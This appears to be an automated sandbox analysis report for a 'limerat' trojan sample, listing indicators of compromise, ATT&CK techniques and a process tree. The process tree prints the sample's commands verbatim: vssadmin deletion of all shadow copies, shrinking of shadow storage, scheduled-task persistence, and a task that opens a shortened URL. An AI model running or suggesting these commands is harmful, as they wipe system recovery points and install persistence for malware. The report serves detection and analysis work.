limerat | 3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
File created	C:\Users\Admin\AppData\Roaming\LinkM\desktop.ini	TRACERT.exe

Enumerates connected drives 3 TTPs 17 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{546E7EBD-69EF-4A94-BF84-88E5012F91DB}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9AE9BCA1-040B-445D-ABD4-B18C2F98E93A}.catalogItem	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4548	1096	WerFault.exe	124

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
3928	schtasks.exe
2396	schtasks.exe
1256	schtasks.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disabling Security Tools
T1089

Modify Registry
T1112

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	svchost.exe

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3644	vssadmin.exe
2052	vssadmin.exe
1408	vssadmin.exe
2920	vssadmin.exe
4404	vssadmin.exe
1432	vssadmin.exe
4872	vssadmin.exe
1348	vssadmin.exe
4040	vssadmin.exe
612	vssadmin.exe
3088	vssadmin.exe
2464	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
4852	powershell.exe
4852	powershell.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe
1096	TRACERT.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeBackupPrivilege	4060	vssvc.exe
Token: SeRestorePrivilege	4060	vssvc.exe
Token: SeAuditPrivilege	4060	vssvc.exe
Token: SeBackupPrivilege	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Token: SeSecurityPrivilege	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Token: SeBackupPrivilege	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
Token: SeDebugPrivilege	1096	TRACERT.exe
Token: SeDebugPrivilege	1096	TRACERT.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 3928	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	75
PID 2228 wrote to memory of 3928	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	75
PID 2228 wrote to memory of 4852	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	78
PID 2228 wrote to memory of 4852	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	78
PID 2228 wrote to memory of 3360	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	80
PID 2228 wrote to memory of 3360	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	80
PID 2228 wrote to memory of 4588	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	81
PID 2228 wrote to memory of 4588	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	81
PID 2228 wrote to memory of 3264	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	83
PID 2228 wrote to memory of 3264	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	83
PID 2228 wrote to memory of 1576	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	103
PID 2228 wrote to memory of 1576	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	103
PID 2228 wrote to memory of 4768	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	85
PID 2228 wrote to memory of 4768	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	85
PID 2228 wrote to memory of 1268	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	88
PID 2228 wrote to memory of 1268	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	88
PID 2228 wrote to memory of 4224	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	91
PID 2228 wrote to memory of 4224	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	91
PID 2228 wrote to memory of 4948	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	93
PID 2228 wrote to memory of 4948	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	93
PID 2228 wrote to memory of 4908	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	94
PID 2228 wrote to memory of 4908	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	94
PID 2228 wrote to memory of 4372	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	98
PID 2228 wrote to memory of 4372	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	98
PID 2228 wrote to memory of 1352	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	97
PID 2228 wrote to memory of 1352	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	97
PID 2228 wrote to memory of 4184	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	100
PID 2228 wrote to memory of 4184	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	100
PID 2228 wrote to memory of 4608	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	102
PID 2228 wrote to memory of 4608	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	102
PID 4588 wrote to memory of 208	4588	cmd.exe	106
PID 4588 wrote to memory of 208	4588	cmd.exe	106
PID 3264 wrote to memory of 2464	3264	cmd.exe	107
PID 3264 wrote to memory of 2464	3264	cmd.exe	107
PID 1576 wrote to memory of 1432	1576	cmd.exe	108
PID 1576 wrote to memory of 1432	1576	cmd.exe	108
PID 4768 wrote to memory of 4872	4768	cmd.exe	110
PID 4768 wrote to memory of 4872	4768	cmd.exe	110
PID 3360 wrote to memory of 4404	3360	cmd.exe	109
PID 3360 wrote to memory of 4404	3360	cmd.exe	109
PID 1268 wrote to memory of 4040	1268	cmd.exe	112
PID 1268 wrote to memory of 4040	1268	cmd.exe	112
PID 4948 wrote to memory of 1348	4948	cmd.exe	111
PID 4948 wrote to memory of 1348	4948	cmd.exe	111
PID 4908 wrote to memory of 612	4908	cmd.exe	113
PID 4908 wrote to memory of 612	4908	cmd.exe	113
PID 1352 wrote to memory of 2052	1352	cmd.exe	117
PID 1352 wrote to memory of 2052	1352	cmd.exe	117
PID 4372 wrote to memory of 3088	4372	cmd.exe	115
PID 4372 wrote to memory of 3088	4372	cmd.exe	115
PID 4224 wrote to memory of 3644	4224	cmd.exe	114
PID 4224 wrote to memory of 3644	4224	cmd.exe	114
PID 4184 wrote to memory of 1408	4184	cmd.exe	118
PID 4184 wrote to memory of 1408	4184	cmd.exe	118
PID 4608 wrote to memory of 2920	4608	cmd.exe	119
PID 4608 wrote to memory of 2920	4608	cmd.exe	119
PID 2228 wrote to memory of 1392	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	121
PID 2228 wrote to memory of 1392	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	121
PID 1392 wrote to memory of 2396	1392	cmd.exe	123
PID 1392 wrote to memory of 2396	1392	cmd.exe	123
PID 2228 wrote to memory of 1096	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	124
PID 2228 wrote to memory of 1096	2228	HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe	124
PID 1096 wrote to memory of 1256	1096	TRACERT.exe	132
PID 1096 wrote to memory of 1256	1096	TRACERT.exe	132

C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe
"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-3a7f8ed681ba28576914896ec61e91b45b7fbe561a69f57ed1c9337573a66c69.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
  2⤵
  - Creates scheduled task(s)
  PID:3928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4852
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4404
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:208
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3264
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2464
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4872
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4040
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3644
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4948
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1348
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:612
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1352
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2052
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4372
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3088
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1408
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2920
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1432
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C schtasks /create /f /st "21:42" /sc weekly /mo "3" /d "Mon" /tn "PerformRemediation" /tr "'explorer'http://bit.ly/2HKY0b9"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1392
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "21:42" /sc weekly /mo "3" /d "Mon" /tn "PerformRemediation" /tr "'explorer'http://bit.ly/2HKY0b9"
    3⤵
    - Creates scheduled task(s)
    PID:2396
- C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe
  "C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 30 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Local\Temp\Help\TRACERT.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1256
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1096 -s 1820
    3⤵
    - Program crash
    PID:4548

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:3692

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 452 -p 1096 -ip 1096
1⤵
PID:2448

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

File Deletion

Modify Registry

Web Service

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery